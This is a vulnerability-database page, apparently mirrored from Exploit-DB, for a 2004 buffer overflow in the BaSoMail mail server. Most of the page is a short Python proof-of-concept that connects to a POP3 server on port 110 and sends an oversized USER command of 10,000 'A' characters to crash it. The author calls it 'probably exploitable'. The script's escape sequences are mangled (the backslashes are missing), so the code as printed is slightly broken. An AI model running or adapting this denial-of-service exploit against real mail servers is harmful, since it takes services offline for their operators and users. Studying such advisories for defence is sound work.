BaSoMail – Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities-安全小百科

BaSoMail – Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

漏洞ID	1054732	漏洞类型
发布时间	2004-10-26	更新时间	2004-10-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/599

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#########################################################
# BaSoMail Multiple Buffer Overflow DOS		 	#
# 24 Oct 2004 - muts 					#
# Probably exploitable - However, I lack sleep!        	#
#########################################################

import struct
import socket

print "nn######################################################"
print "nBaSoMail Multiple Buffer Overflow DOS"
print "nFound & coded by muts [at] whitehat.co.il"
print "nAlmost all the SMTP and POP3 commands are prone to BO.n" 
print "nFor Educational Purposes Only!n" 
print "nn######################################################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Example buffer overflow 

buffer = 'x41'*10000

try:
	print "nSending evil buffer..."
	s.connect(('192.168.1.32',110))
	s.send('USER ' + buffer + 'rn')
	data = s.recv(1024)
	s.close()
	print "nRun this script again, and server should crash."
except:
	print "nCould not connect to sever!"

# milw0rm.com [2004-10-26]

相关推荐: Sux Services SQL Injection Vulnerability

Sux Services SQL Injection Vulnerability 漏洞ID 1100771 漏洞类型 Input Validation Error 发布时间 2003-02-28 更新时间 2003-02-28 CVE编号 N/A CNNVD-…

文章版权归作者所有，未经允许请勿转载。

THE END